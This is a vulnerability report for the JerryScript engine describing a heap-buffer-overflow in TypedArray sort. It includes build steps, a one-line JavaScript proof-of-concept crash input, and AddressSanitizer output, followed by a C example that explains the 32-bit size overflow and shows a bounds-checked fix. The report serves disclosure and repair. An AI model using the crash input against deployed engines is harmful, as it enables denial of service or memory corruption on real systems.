
heap-buffer-overflow in ecma_builtin_typedarray_prototype_sort #5067

@EJueon

Description

JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps
python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20
Test case
// poc.js
a = new Int16Array(1073741825).sort();
Execution steps & Output
$ ./jerryscript/build/bin/jerry poc.js
==3598395==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf5100634 at pc 0x5666342e bp 0xffaaafb8 sp 0xffaaafa8
WRITE of size 4 at 0xf5100634 thread T0
    #0 0x5666342d in ecma_builtin_typedarray_prototype_sort /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1261
    #1 0x5666342d in ecma_builtin_typedarray_prototype_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:2007
    #2 0x5665ea28 in ecma_builtin_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #3 0x5665ea28 in ecma_builtin_dispatch_call /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #4 0x56673db7 in ecma_op_function_call_native_built_in /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #5 0x56675c84 in ecma_op_function_call /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #6 0x566d6e89 in opfunc_call /jerryscript/jerry-core/vm/vm.c:758
    #7 0x566d6e89 in vm_execute /jerryscript/jerry-core/vm/vm.c:5217
    #8 0x566d8152 in vm_run /jerryscript/jerry-core/vm/vm.c:5312
    #9 0x566d838f in vm_run_global /jerryscript/jerry-core/vm/vm.c:286
    #10 0x5663682e in jerry_run /jerryscript/jerry-core/api/jerryscript.c:548
    #11 0x5672b354 in jerryx_repl /jerryscript/jerry-ext/util/repl.c:66
    #12 0x5662ef56 in main /jerryscript/jerry-main/main-desktop.c:226
    #13 0xf7621ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
    #14 0x56631fb4 in _start (/jerryscript/build/bin/jerry+0x12fb4)

0xf5100634 is located 0 bytes to the right of 4-byte region [0xf5100630,0xf5100634)
allocated by thread T0 here:
    #0 0xf7a0a817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x56631ae4 in jmem_heap_alloc /jerryscript/jerry-core/jmem/jmem-heap.c:254
    #2 0x56696d8d in jmem_heap_gc_and_alloc_block /jerryscript/jerry-core/jmem/jmem-heap.c:291
    #3 0x56663281 in ecma_builtin_typedarray_prototype_sort /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1248
    #4 0x56663281 in ecma_builtin_typedarray_prototype_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:2007
    #5 0x5665ea28 in ecma_builtin_dispatch_routine /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #6 0x5665ea28 in ecma_builtin_dispatch_call /jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #7 0x56673db7 in ecma_op_function_call_native_built_in /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #8 0x56675c84 in ecma_op_function_call /jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #9 0x566d6e89 in opfunc_call /jerryscript/jerry-core/vm/vm.c:758
    #10 0x566d6e89 in vm_execute /jerryscript/jerry-core/vm/vm.c:5217
    #11 0x566d8152 in vm_run /jerryscript/jerry-core/vm/vm.c:5312
    #12 0x566d838f in vm_run_global /jerryscript/jerry-core/vm/vm.c:286
    #13 0x5663682e in jerry_run /jerryscript/jerry-core/api/jerryscript.c:548
    #14 0x5672b354 in jerryx_repl /jerryscript/jerry-ext/util/repl.c:66
    #15 0x5662ef56 in main /jerryscript/jerry-main/main-desktop.c:226
    #16 0xf7621ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)

SUMMARY: AddressSanitizer: heap-buffer-overflow /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c:1261 in ecma_builtin_typedarray_prototype_sort
Shadow bytes around the buggy address:
==3598395==ABORTING


With debugging mode (--debug)

Outputs
ICE: Assertion 'buffer_index == info_p->length' failed at /jerryscript/jerry-core/ecma/builtin-objects/typedarray/ecma-builtin-typedarray-prototype.c(ecma_builtin_typedarray_prototype_sort):1265.
Error: JERRY_FATAL_FAILED_ASSERTION

Credits: @EJueon, @Ye0nny of seclab-yonsei.
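The 4-byte region in the ASan report is consistent with a 32-bit size computation wrapping: 1073741825 * 4 = 2^32 + 4. The C example below is added here and is not JerryScript's code; it assumes (unconfirmed by the report) that the sort's scratch buffer is sized as length times a 4-byte value type, models that multiply on uint32_t to mirror the -m32 build, and shows the overflow check that refuses the allocation instead of producing an under-sized buffer.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Stand-in for a 4-byte engine value type (assumption, not JerryScript's ecma_value_t). */
typedef uint32_t value_t;

/* Size arithmetic is done on uint32_t to model the -m32 build from the report,
 * where size_t is 32 bits wide. */
static uint32_t wrapping_mul_u32(uint32_t a, uint32_t b)
{
  return a * b; /* unsigned multiply silently wraps modulo 2^32 */
}

/* Overflow-checked multiply: returns false when a*b does not fit in 32 bits. */
static bool checked_mul_u32(uint32_t a, uint32_t b, uint32_t *out)
{
  if (a != 0 && b > UINT32_MAX / a)
    return false;
  *out = a * b;
  return true;
}

/* Hypothetical copy-out step of a typed-array sort: allocate one value_t per
 * element and copy the elements in. If the byte count would wrap, refuse up
 * front instead of allocating a tiny buffer that the copy loop then overruns. */
static value_t *copy_values_checked(const int16_t *src, uint32_t length)
{
  uint32_t bytes;
  if (!checked_mul_u32(length, (uint32_t) sizeof(value_t), &bytes))
    return NULL;
  value_t *buf = malloc(bytes ? bytes : 1);
  if (buf == NULL)
    return NULL;
  for (uint32_t i = 0; i < length; i++)
    buf[i] = (value_t) (int32_t) src[i];
  return buf;
}

int main(void)
{
  /* The report's length: an Int16Array of 1073741825 elements. */
  uint32_t len = 1073741825u;
  printf("wrapped byte count: %u\n", wrapping_mul_u32(len, (uint32_t) sizeof(value_t)));
  printf("checked copy: %s\n", copy_values_checked(NULL, len) ? "allocated" : "refused");
  return 0;
}
```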
